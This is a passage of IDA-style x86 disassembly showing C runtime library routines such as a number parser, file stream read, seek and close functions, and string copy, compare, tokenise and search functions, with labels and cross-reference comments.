test eax, eax
jz short loc_418D00
mov bl, [esi]
inc esi
jmp short loc_418CD0
; ---------------------------------------------------------------------------
loc_418D00: ; CODE XREF: sub_418CB8+41�j
cmp bl, 2Dh
mov [ebp+var_4], esi
jnz short loc_418D0E
or [ebp+arg_C], 2
jmp short loc_418D13
; ---------------------------------------------------------------------------
loc_418D0E: ; CODE XREF: sub_418CB8+4E�j
cmp bl, 2Bh
jnz short loc_418D19
loc_418D13: ; CODE XREF: sub_418CB8+54�j
mov bl, [esi]
inc esi
mov [ebp+var_4], esi
loc_418D19: ; CODE XREF: sub_418CB8+59�j
mov eax, [ebp+arg_8]
test eax, eax
jl loc_418EB0
cmp eax, 1
jz loc_418EB0
cmp eax, 24h
jg loc_418EB0
push 10h
test eax, eax
pop ecx
jnz short loc_418D61
cmp bl, 30h
jz short loc_418D4B
mov [ebp+arg_8], 0Ah
jmp short loc_418D7D
; ---------------------------------------------------------------------------
loc_418D4B: ; CODE XREF: sub_418CB8+88�j
mov al, [esi]
cmp al, 78h
jz short loc_418D5E
cmp al, 58h
jz short loc_418D5E
mov [ebp+arg_8], 8
jmp short loc_418D7D
; ---------------------------------------------------------------------------
loc_418D5E: ; CODE XREF: sub_418CB8+97�j
; sub_418CB8+9B�j
mov [ebp+arg_8], ecx
loc_418D61: ; CODE XREF: sub_418CB8+83�j
cmp [ebp+arg_8], ecx
jnz short loc_418D7D
cmp bl, 30h
jnz short loc_418D7D
mov al, [esi]
cmp al, 78h
jz short loc_418D75
cmp al, 58h
jnz short loc_418D7D
loc_418D75: ; CODE XREF: sub_418CB8+B7�j
mov bl, [esi+1]
inc esi
inc esi
mov [ebp+var_4], esi
loc_418D7D: ; CODE XREF: sub_418CB8+91�j
; sub_418CB8+A4�j ...
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
mov edi, 103h
mov [ebp+var_C], eax
loc_418D8D: ; CODE XREF: sub_418CB8+16C�j
cmp cbMultiByte, 1
movzx esi, bl
jle short loc_418DA5
push 4 ; int
push esi ; CharType
call sub_41ADC4
pop ecx
pop ecx
jmp short loc_418DB0
; ---------------------------------------------------------------------------
loc_418DA5: ; CODE XREF: sub_418CB8+DF�j
mov eax, dword_43DD30
mov al, [eax+esi*2]
and eax, 4
loc_418DB0: ; CODE XREF: sub_418CB8+EB�j
test eax, eax
jz short loc_418DBC
movsx ecx, bl
sub ecx, 30h
jmp short loc_418DEE
; ---------------------------------------------------------------------------
loc_418DBC: ; CODE XREF: sub_418CB8+FA�j
cmp cbMultiByte, 1
jle short loc_418DD0
push edi ; int
push esi ; CharType
call sub_41ADC4
pop ecx
pop ecx
jmp short loc_418DDB
; ---------------------------------------------------------------------------
loc_418DD0: ; CODE XREF: sub_418CB8+10B�j
mov eax, dword_43DD30
mov ax, [eax+esi*2]
and eax, edi
loc_418DDB: ; CODE XREF: sub_418CB8+116�j
test eax, eax
jz short loc_418E29
movsx eax, bl
push eax ; MultiByteStr
call sub_41D8E9
pop ecx
mov ecx, eax
sub ecx, 37h
loc_418DEE: ; CODE XREF: sub_418CB8+102�j
cmp ecx, [ebp+arg_8]
jnb short loc_418E29
mov esi, [ebp+var_8]
or [ebp+arg_C], 8
cmp esi, [ebp+var_C]
jb short loc_418E13
jnz short loc_418E0D
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
cmp ecx, edx
jbe short loc_418E13
loc_418E0D: ; CODE XREF: sub_418CB8+147�j
or [ebp+arg_C], 4
jmp short loc_418E1C
; ---------------------------------------------------------------------------
loc_418E13: ; CODE XREF: sub_418CB8+145�j
; sub_418CB8+153�j
imul esi, [ebp+arg_8]
add esi, ecx
mov [ebp+var_8], esi
loc_418E1C: ; CODE XREF: sub_418CB8+159�j
mov eax, [ebp+var_4]
inc [ebp+var_4]
mov bl, [eax]
jmp loc_418D8D
; ---------------------------------------------------------------------------
loc_418E29: ; CODE XREF: sub_418CB8+125�j
; sub_418CB8+139�j
mov ecx, [ebp+arg_C]
dec [ebp+var_4]
mov edx, [ebp+arg_4]
test cl, 8
jnz short loc_418E47
test edx, edx
jz short loc_418E41
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_418E41: ; CODE XREF: sub_418CB8+181�j
and [ebp+var_8], 0
jmp short loc_418E94
; ---------------------------------------------------------------------------
loc_418E47: ; CODE XREF: sub_418CB8+17D�j
test cl, 4
mov eax, 7FFFFFFFh
jnz short loc_418E6D
test cl, 1
jnz short loc_418E94
and ecx, 2
jz short loc_418E64
cmp [ebp+var_8], 80000000h
ja short loc_418E6D
loc_418E64: ; CODE XREF: sub_418CB8+1A1�j
test ecx, ecx
jnz short loc_418E94
cmp [ebp+var_8], eax
jbe short loc_418E94
loc_418E6D: ; CODE XREF: sub_418CB8+197�j
; sub_418CB8+1AA�j
test byte ptr [ebp+arg_C], 1
mov dword ptr byte_445EDC+0D43E4h, 22h
jz short loc_418E83
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_418E94
; ---------------------------------------------------------------------------
loc_418E83: ; CODE XREF: sub_418CB8+1C3�j
mov ecx, [ebp+arg_C]
and cl, 2
neg cl
sbb ecx, ecx
neg ecx
add ecx, eax
mov [ebp+var_8], ecx
loc_418E94: ; CODE XREF: sub_418CB8+18D�j
; sub_418CB8+19C�j ...
test edx, edx
jz short loc_418E9D
mov eax, [ebp+var_4]
mov [edx], eax
loc_418E9D: ; CODE XREF: sub_418CB8+1DE�j
test byte ptr [ebp+arg_C], 2
jz short loc_418EAB
mov eax, [ebp+var_8]
neg eax
mov [ebp+var_8], eax
loc_418EAB: ; CODE XREF: sub_418CB8+1E9�j
mov eax, [ebp+var_8]
jmp short loc_418EBB
; ---------------------------------------------------------------------------
loc_418EB0: ; CODE XREF: sub_418CB8+66�j
; sub_418CB8+6F�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_418EB9
mov [eax], edi
loc_418EB9: ; CODE XREF: sub_418CB8+1FD�j
xor eax, eax
loc_418EBB: ; CODE XREF: sub_418CB8+1F6�j
pop edi
pop esi
pop ebx
leave
retn
sub_418CB8 endp
; =============== S U B R O U T I N E =======================================
sub_418EC0 proc near ; CODE XREF: sub_405D1B+48E�p
; sub_40FCA3+3850�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_418CB8
add esp, 10h
retn
sub_418EC0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418ED7 proc near ; CODE XREF: sub_405D1B+234�p
; sub_405D1B+438�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
mov [ebp+var_14], 49h
push eax
mov [ebp+var_18], eax
mov [ebp+var_20], eax
call sub_4180D0
mov [ebp+var_1C], eax
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
push eax
call sub_41D9B5
add esp, 10h
leave
retn
sub_418ED7 endp
; =============== S U B R O U T I N E =======================================
sub_418F0B proc near ; CODE XREF: sub_406361+A8�p
; sub_407516+4AF�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push edi
or edi, 0FFFFFFFFh
mov eax, [esi+0Ch]
test al, 40h
jz short loc_418F20
or eax, 0FFFFFFFFh
jmp short loc_418F5A
; ---------------------------------------------------------------------------
loc_418F20: ; CODE XREF: sub_418F0B+E�j
test al, 83h
jz short loc_418F58
push esi
call sub_41E57F
push esi
mov edi, eax
call sub_41E519
push dword ptr [esi+10h]
call sub_41E466
add esp, 0Ch
test eax, eax
jge short loc_418F46
or edi, 0FFFFFFFFh
jmp short loc_418F58
; ---------------------------------------------------------------------------
loc_418F46: ; CODE XREF: sub_418F0B+34�j
mov eax, [esi+1Ch]
test eax, eax
jz short loc_418F58
push eax ; lpMem
call sub_418227
and dword ptr [esi+1Ch], 0
pop ecx
loc_418F58: ; CODE XREF: sub_418F0B+17�j
; sub_418F0B+39�j ...
mov eax, edi
loc_418F5A: ; CODE XREF: sub_418F0B+13�j
and dword ptr [esi+0Ch], 0
pop edi
pop esi
retn
sub_418F0B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_418F61 proc near ; CODE XREF: sub_406361+7A�p
; sub_407516+30E�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
mov edi, [ebp+arg_4]
imul edi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
mov ecx, edi
test edi, edi
mov [ebp+var_4], edi
mov [ebp+arg_0], ecx
jnz short loc_418F85
xor eax, eax
jmp loc_41902E
; ---------------------------------------------------------------------------
loc_418F85: ; CODE XREF: sub_418F61+1B�j
mov esi, [ebp+arg_C]
test word ptr [esi+0Ch], 10Ch
jz short loc_418F98
mov eax, [esi+18h]
mov [ebp+arg_C], eax
jmp short loc_418FA4
; ---------------------------------------------------------------------------
loc_418F98: ; CODE XREF: sub_418F61+2D�j
mov [ebp+arg_C], 1000h
jmp short loc_418FA4
; ---------------------------------------------------------------------------
loc_418FA1: ; CODE XREF: sub_418F61+C4�j
mov ecx, [ebp+arg_0]
loc_418FA4: ; CODE XREF: sub_418F61+35�j
; sub_418F61+3E�j
test word ptr [esi+0Ch], 10Ch
jz short loc_418FD6
mov eax, [esi+4]
test eax, eax
jz short loc_418FD6
cmp ecx, eax
mov edi, ecx
jb short loc_418FBB
mov edi, eax
loc_418FBB: ; CODE XREF: sub_418F61+56�j
push edi
push dword ptr [esi]
push ebx
call sub_417A40
sub [ebp+arg_0], edi
sub [esi+4], edi
add [esi], edi
add esp, 0Ch
add ebx, edi
mov edi, [ebp+var_4]
jmp short loc_419021
; ---------------------------------------------------------------------------
loc_418FD6: ; CODE XREF: sub_418F61+49�j
; sub_418F61+50�j
cmp ecx, [ebp+arg_C]
jb short loc_419009
cmp [ebp+arg_C], 0
mov eax, ecx
jz short loc_418FEC
xor edx, edx
div [ebp+arg_C]
mov eax, ecx
sub eax, edx
loc_418FEC: ; CODE XREF: sub_418F61+80�j
push eax
push ebx
push dword ptr [esi+10h]
call sub_41E72A
add esp, 0Ch
test eax, eax
jz short loc_419033
cmp eax, 0FFFFFFFFh
jz short loc_419039
sub [ebp+arg_0], eax
add ebx, eax
jmp short loc_419021
; ---------------------------------------------------------------------------
loc_419009: ; CODE XREF: sub_418F61+78�j
push esi
call sub_41E651
cmp eax, 0FFFFFFFFh
pop ecx
jz short loc_41903D
mov [ebx], al
mov eax, [esi+18h]
inc ebx
dec [ebp+arg_0]
mov [ebp+arg_C], eax
loc_419021: ; CODE XREF: sub_418F61+73�j
; sub_418F61+A6�j
cmp [ebp+arg_0], 0
jnz loc_418FA1
mov eax, [ebp+arg_8]
loc_41902E: ; CODE XREF: sub_418F61+1F�j
; sub_418F61+E6�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_419033: ; CODE XREF: sub_418F61+9A�j
or dword ptr [esi+0Ch], 10h
jmp short loc_41903D
; ---------------------------------------------------------------------------
loc_419039: ; CODE XREF: sub_418F61+9F�j
or dword ptr [esi+0Ch], 20h
loc_41903D: ; CODE XREF: sub_418F61+B2�j
; sub_418F61+D6�j
mov eax, edi
xor edx, edx
sub eax, [ebp+arg_0]
div [ebp+arg_4]
jmp short loc_41902E
sub_418F61 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419049 proc near ; CODE XREF: sub_406361+47�p
; sub_4191A1+2A�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
xor ebx, ebx
mov esi, [edi+10h]
cmp [edi+4], ebx
mov [ebp+var_C], esi
jge short loc_419065
mov [edi+4], ebx
loc_419065: ; CODE XREF: sub_419049+17�j
push 1
push ebx
push esi
call sub_41EACB
add esp, 0Ch
cmp eax, ebx
mov [ebp+var_4], eax
jl short loc_4190D3
mov edx, [edi+0Ch]
test dx, 108h
jnz short loc_41908A
sub eax, [edi+4]
jmp loc_41919C
; ---------------------------------------------------------------------------
loc_41908A: ; CODE XREF: sub_419049+37�j
mov eax, [edi]
mov ecx, [edi+8]
mov ebx, eax
sub ebx, ecx
test dl, 3
mov [ebp+var_8], ebx
jz short loc_4190C4
mov edx, esi
mov ebx, esi
sar edx, 5
and ebx, 1Fh
mov edx, dword ptr byte_445EDC+0D5924h[edx*4]
test byte ptr [edx+ebx*8+4], 80h
jz short loc_4190DB
mov edx, ecx
loc_4190B5: ; CODE XREF: sub_419049+79�j
cmp edx, eax
jnb short loc_4190DB
cmp byte ptr [edx], 0Ah
jnz short loc_4190C1
inc [ebp+var_8]
loc_4190C1: ; CODE XREF: sub_419049+73�j
inc edx
jmp short loc_4190B5
; ---------------------------------------------------------------------------
loc_4190C4: ; CODE XREF: sub_419049+50�j
test dl, 80h
jnz short loc_4190DB
mov dword ptr byte_445EDC+0D43E4h, 16h
loc_4190D3: ; CODE XREF: sub_419049+2D�j
or eax, 0FFFFFFFFh
jmp loc_41919C
; ---------------------------------------------------------------------------
loc_4190DB: ; CODE XREF: sub_419049+68�j
; sub_419049+6E�j ...
cmp [ebp+var_4], 0
jnz short loc_4190E9
mov eax, [ebp+var_8]
jmp loc_41919C
; ---------------------------------------------------------------------------
loc_4190E9: ; CODE XREF: sub_419049+96�j
test byte ptr [edi+0Ch], 1
jz loc_419194
mov edx, [edi+4]
test edx, edx
jnz short loc_419102
and [ebp+var_8], edx
jmp loc_419194
; ---------------------------------------------------------------------------
loc_419102: ; CODE XREF: sub_419049+AF�j
sub eax, ecx
add eax, edx
mov [ebp+arg_0], eax
mov eax, esi
sar eax, 5
and esi, 1Fh
lea ebx, ds:51B800h[eax*4]
shl esi, 3
mov eax, [ebx]
test byte ptr [esi+eax+4], 80h
jz short loc_41918E
push 2
push 0
push [ebp+var_C]
call sub_41EACB
add esp, 0Ch
cmp eax, [ebp+var_4]
jnz short loc_419155
mov eax, [edi+8]
mov ecx, [ebp+arg_0]
add ecx, eax
loc_419140: ; CODE XREF: sub_419049+104�j
cmp eax, ecx
jnb short loc_41914F
cmp byte ptr [eax], 0Ah
jnz short loc_41914C
inc [ebp+arg_0]
loc_41914C: ; CODE XREF: sub_419049+FE�j
inc eax
jmp short loc_419140
; ---------------------------------------------------------------------------
loc_41914F: ; CODE XREF: sub_419049+F9�j
test byte ptr [edi+0Dh], 20h
jmp short loc_419189
; ---------------------------------------------------------------------------
loc_419155: ; CODE XREF: sub_419049+ED�j
push 0
push [ebp+var_4]
push [ebp+var_C]
call sub_41EACB
mov eax, 200h
add esp, 0Ch
cmp [ebp+arg_0], eax
ja short loc_41917C
mov ecx, [edi+0Ch]
test cl, 8
jz short loc_41917C
test ch, 4
jz short loc_41917F
loc_41917C: ; CODE XREF: sub_419049+124�j
; sub_419049+12C�j
mov eax, [edi+18h]
loc_41917F: ; CODE XREF: sub_419049+131�j
mov [ebp+arg_0], eax
mov eax, [ebx]
test byte ptr [esi+eax+4], 4
loc_419189: ; CODE XREF: sub_419049+10A�j
jz short loc_41918E
inc [ebp+arg_0]
loc_41918E: ; CODE XREF: sub_419049+D9�j
; sub_419049:loc_419189�j
mov eax, [ebp+arg_0]
sub [ebp+var_4], eax
loc_419194: ; CODE XREF: sub_419049+A4�j
; sub_419049+B4�j
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
add eax, ecx
loc_41919C: ; CODE XREF: sub_419049+3C�j
; sub_419049+8D�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_419049 endp
; =============== S U B R O U T I N E =======================================
sub_4191A1 proc near ; CODE XREF: sub_406361+41�p
; sub_406361+4F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push esi
mov esi, [esp+4+arg_0]
push edi
mov eax, [esi+0Ch]
test al, 83h
jz short loc_41921D
mov edi, [esp+8+arg_8]
test edi, edi
jz short loc_4191C0
cmp edi, 1
jz short loc_4191C0
cmp edi, 2
jnz short loc_41921D
loc_4191C0: ; CODE XREF: sub_4191A1+13�j
; sub_4191A1+18�j
and al, 0EFh
cmp edi, 1
mov [esi+0Ch], eax
jnz short loc_4191D7
push esi
call sub_419049
add [esp+0Ch+arg_4], eax
pop ecx
xor edi, edi
loc_4191D7: ; CODE XREF: sub_4191A1+27�j
push esi
call sub_41E57F
mov eax, [esi+0Ch]
pop ecx
test al, 80h
jz short loc_4191EC
and al, 0FCh
mov [esi+0Ch], eax
jmp short loc_419200
; ---------------------------------------------------------------------------
loc_4191EC: ; CODE XREF: sub_4191A1+42�j
test al, 1
jz short loc_419200
test al, 8
jz short loc_419200
test ah, 4
jnz short loc_419200
mov dword ptr [esi+18h], 200h
loc_419200: ; CODE XREF: sub_4191A1+49�j
; sub_4191A1+4D�j ...
push edi
push [esp+0Ch+arg_4]
push dword ptr [esi+10h]
call sub_41EACB
add esp, 0Ch
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
dec ecx
mov eax, ecx
jmp short loc_41922A
; ---------------------------------------------------------------------------
loc_41921D: ; CODE XREF: sub_4191A1+B�j
; sub_4191A1+1D�j
mov dword ptr byte_445EDC+0D43E4h, 16h
or eax, 0FFFFFFFFh
loc_41922A: ; CODE XREF: sub_4191A1+7A�j
pop edi
pop esi
retn
sub_4191A1 endp
; =============== S U B R O U T I N E =======================================
sub_41922D proc near ; CODE XREF: sub_41924D+A�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
call sub_41ECD5
test eax, eax
jnz short loc_419237
retn
; ---------------------------------------------------------------------------
loc_419237: ; CODE XREF: sub_41922D+7�j
push eax
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_41EB65
add esp, 10h
retn
sub_41922D endp
; =============== S U B R O U T I N E =======================================
sub_41924D proc near ; CODE XREF: sub_406361+30�p
; sub_407516+134�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push 40h
push [esp+4+arg_4]
push [esp+8+arg_0]
call sub_41922D
add esp, 0Ch
retn
sub_41924D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419260 proc near ; CODE XREF: sub_406428+2A1�p
; sub_4069DA+100�p ...
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
mov esi, [ebp+arg_4]
push edi
push 8
xor eax, eax
pop ecx
lea edi, [ebp+var_20]
rep stosd
push 7
pop edi
loc_419279: ; CODE XREF: sub_419260+32�j
mov dl, [esi]
mov bl, 1
movzx ecx, dl
mov eax, ecx
and ecx, edi
shr eax, 3
shl bl, cl
lea eax, [ebp+eax+var_20]
or [eax], bl
inc esi
test dl, dl
jnz short loc_419279
mov edx, [ebp+arg_0]
test edx, edx
jnz short loc_4192A1
mov edx, dword ptr byte_445EDC+0D43C8h
loc_4192A1: ; CODE XREF: sub_419260+39�j
; sub_419260+5F�j
mov al, [edx]
push 1
movzx esi, al
mov ecx, esi
pop ebx
and ecx, edi
shl ebx, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test bl, cl
jz short loc_4192C1
test al, al
jz short loc_4192C1
inc edx
jmp short loc_4192A1
; ---------------------------------------------------------------------------
loc_4192C1: ; CODE XREF: sub_419260+58�j
; sub_419260+5C�j
mov ebx, edx
loc_4192C3: ; CODE XREF: sub_419260+81�j
mov al, [edx]
test al, al
jz short loc_4192E7
movzx esi, al
mov ecx, esi
push 1
and ecx, edi
pop eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test al, cl
jnz short loc_4192E3
inc edx
jmp short loc_4192C3
; ---------------------------------------------------------------------------
loc_4192E3: ; CODE XREF: sub_419260+7E�j
and byte ptr [edx], 0
inc edx
loc_4192E7: ; CODE XREF: sub_419260+67�j
mov eax, ebx
pop edi
sub eax, edx
pop esi
neg eax
sbb eax, eax
mov dword ptr byte_445EDC+0D43C8h, edx
and eax, ebx
pop ebx
leave
retn
sub_419260 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419300 proc near ; CODE XREF: sub_406C89+1B3�p
; sub_407B48+72�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz short loc_419383
push esi
push ebx
mov ebx, ecx
mov esi, [esp+0Ch+arg_4]
test esi, 3
mov edi, [esp+0Ch+arg_0]
jnz short loc_419324
shr ecx, 2
jnz short loc_419391
jmp short loc_419345
; ---------------------------------------------------------------------------
loc_419324: ; CODE XREF: sub_419300+1B�j
; sub_419300+37�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
dec ecx
jz short loc_419352
test al, al
jz short loc_41935A
test esi, 3
jnz short loc_419324
mov ebx, ecx
shr ecx, 2
jnz short loc_419391
loc_419340: ; CODE XREF: sub_419300+8F�j
and ebx, 3
jz short loc_419352
loc_419345: ; CODE XREF: sub_419300+22�j
; sub_419300+50�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
test al, al
jz short loc_41937E
dec ebx
jnz short loc_419345
loc_419352: ; CODE XREF: sub_419300+2B�j
; sub_419300+43�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_41935A: ; CODE XREF: sub_419300+2F�j
test edi, 3
jz short loc_419374
loc_419362: ; CODE XREF: sub_419300+72�j
mov [edi], al
inc edi
dec ecx
jz loc_4193F6
test edi, 3
jnz short loc_419362
loc_419374: ; CODE XREF: sub_419300+60�j
mov ebx, ecx
shr ecx, 2
jnz short loc_4193E7
loc_41937B: ; CODE XREF: sub_419300+7F�j
; sub_419300+F4�j
mov [edi], al
inc edi
loc_41937E: ; CODE XREF: sub_419300+4D�j
dec ebx
jnz short loc_41937B
pop ebx
pop esi
loc_419383: ; CODE XREF: sub_419300+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_419389: ; CODE XREF: sub_419300+A9�j
; sub_419300+C1�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_419340
loc_419391: ; CODE XREF: sub_419300+20�j
; sub_419300+3E�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_419389
test dl, dl
jz short loc_4193DB
test dh, dh
jz short loc_4193D1
test edx, 0FF0000h
jz short loc_4193C7
test edx, 0FF000000h
jnz short loc_419389
mov [edi], edx
jmp short loc_4193DF
; ---------------------------------------------------------------------------
loc_4193C7: ; CODE XREF: sub_419300+B9�j
and edx, 0FFFFh
mov [edi], edx
jmp short loc_4193DF
; ---------------------------------------------------------------------------
loc_4193D1: ; CODE XREF: sub_419300+B1�j
and edx, 0FFh
mov [edi], edx
jmp short loc_4193DF
; ---------------------------------------------------------------------------
loc_4193DB: ; CODE XREF: sub_419300+AD�j
xor edx, edx
mov [edi], edx
loc_4193DF: ; CODE XREF: sub_419300+C5�j
; sub_419300+CF�j ...
add edi, 4
xor eax, eax
dec ecx
jz short loc_4193F1
loc_4193E7: ; CODE XREF: sub_419300+79�j
xor eax, eax
loc_4193E9: ; CODE XREF: sub_419300+EF�j
mov [edi], eax
add edi, 4
dec ecx
jnz short loc_4193E9
loc_4193F1: ; CODE XREF: sub_419300+E5�j
and ebx, 3
jnz short loc_41937B
loc_4193F6: ; CODE XREF: sub_419300+66�j
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_419300 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419400 proc near ; CODE XREF: sub_407516+2AC�p
; sub_407516+2CD�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_419431
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_41942F
jz short loc_419431
dec ecx
dec ecx
loc_41942F: ; CODE XREF: sub_419400+29�j
not ecx
loc_419431: ; CODE XREF: sub_419400+9�j
; sub_419400+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_419400 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_419440 proc near ; CODE XREF: sub_407A07+5C�p
; sub_407A07+9B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov ecx, [esp+arg_8]
push edi
test ecx, ecx
jz loc_4194F4
mov edi, [esp+4+arg_0]
push esi
test edi, 3
push ebx
jz short loc_41946A
loc_41945B: ; CODE XREF: sub_419440+28�j
mov al, [edi]
inc edi
test al, al
jz short loc_41949B
test edi, 3
jnz short loc_41945B
loc_41946A: ; CODE XREF: sub_419440+19�j
; sub_419440+40�j ...
mov eax, [edi]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add edi, 4
test eax, 81010100h
jz short loc_41946A
mov eax, [edi-4]
test al, al
jz short loc_4194A8
test ah, ah
jz short loc_4194A3
test eax, 0FF0000h
jz short loc_41949E
test eax, 0FF000000h
jnz short loc_41946A
loc_41949B: ; CODE XREF: sub_419440+20�j
dec edi
jmp short loc_4194AB
; ---------------------------------------------------------------------------
loc_41949E: ; CODE XREF: sub_419440+52�j
sub edi, 2
jmp short loc_4194AB
; ---------------------------------------------------------------------------
loc_4194A3: ; CODE XREF: sub_419440+4B�j
sub edi, 3
jmp short loc_4194AB
; ---------------------------------------------------------------------------
loc_4194A8: ; CODE XREF: sub_419440+47�j
sub edi, 4
loc_4194AB: ; CODE XREF: sub_419440+5C�j
; sub_419440+61�j ...
mov esi, [esp+0Ch+arg_4]
test esi, 3
jnz short loc_4194C0
mov ebx, ecx
shr ecx, 2
jnz short loc_41950C
jmp short loc_4194DC
; ---------------------------------------------------------------------------
loc_4194C0: ; CODE XREF: sub_419440+75�j
; sub_419440+93�j
mov dl, [esi]
inc esi
test dl, dl
jz short loc_4194FA
mov [edi], dl
inc edi
dec ecx
jz short loc_4194F0
test esi, 3
jnz short loc_4194C0
mov ebx, ecx
shr ecx, 2
jnz short loc_41950C
loc_4194DC: ; CODE XREF: sub_419440+7E�j
; sub_419440+CA�j
mov ecx, ebx
and ecx, 3
jz short loc_4194F0
loc_4194E3: ; CODE XREF: sub_419440+AE�j
mov dl, [esi]
inc esi
mov [edi], dl
inc edi
test dl, dl
jz short loc_4194F2
dec ecx
jnz short loc_4194E3
loc_4194F0: ; CODE XREF: sub_419440+8B�j
; sub_419440+A1�j
mov [edi], cl
loc_4194F2: ; CODE XREF: sub_419440+AB�j
pop ebx
pop esi
loc_4194F4: ; CODE XREF: sub_419440+7�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4194FA: ; CODE XREF: sub_419440+85�j
; sub_419440+E8�j
mov [edi], dl
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_419504: ; CODE XREF: sub_419440+E4�j
; sub_419440+FC�j
mov [edi], edx
add edi, 4
dec ecx
jz short loc_4194DC
loc_41950C: ; CODE XREF: sub_419440+7C�j
; sub_419440+9A�j
mov edx, 7EFEFEFFh
mov eax, [esi]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [esi]
add esi, 4
test eax, 81010100h
jz short loc_419504
test dl, dl
jz short loc_4194FA
test dh, dh
jz short loc_419558
test edx, 0FF0000h
jz short loc_419548
test edx, 0FF000000h
jnz short loc_419504
mov [edi], edx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_419548: ; CODE XREF: sub_419440+F4�j
mov [edi], dx
xor edx, edx
mov eax, [esp+0Ch+arg_0]
mov [edi+2], dl
pop ebx
pop esi
pop edi
retn
; ---------------------------------------------------------------------------
loc_419558: ; CODE XREF: sub_419440+EC�j
mov [edi], dx
mov eax, [esp+0Ch+arg_0]
pop ebx
pop esi
pop edi
retn
sub_419440 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_419570 proc near ; CODE XREF: sub_407B48+2F1�p
; sub_40FCA3+32AD�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
inc ecx
neg ecx
dec edi
mov al, [ebp+arg_4]
std
repne scasb
inc edi
cmp [edi], al
jz short loc_419591
xor eax, eax
jmp short loc_419593
; ---------------------------------------------------------------------------
loc_419591: ; CODE XREF: sub_419570+1B�j
mov eax, edi
loc_419593: ; CODE XREF: sub_419570+1F�j
cld
pop edi
leave
retn
sub_419570 endp
; =============== S U B R O U T I N E =======================================
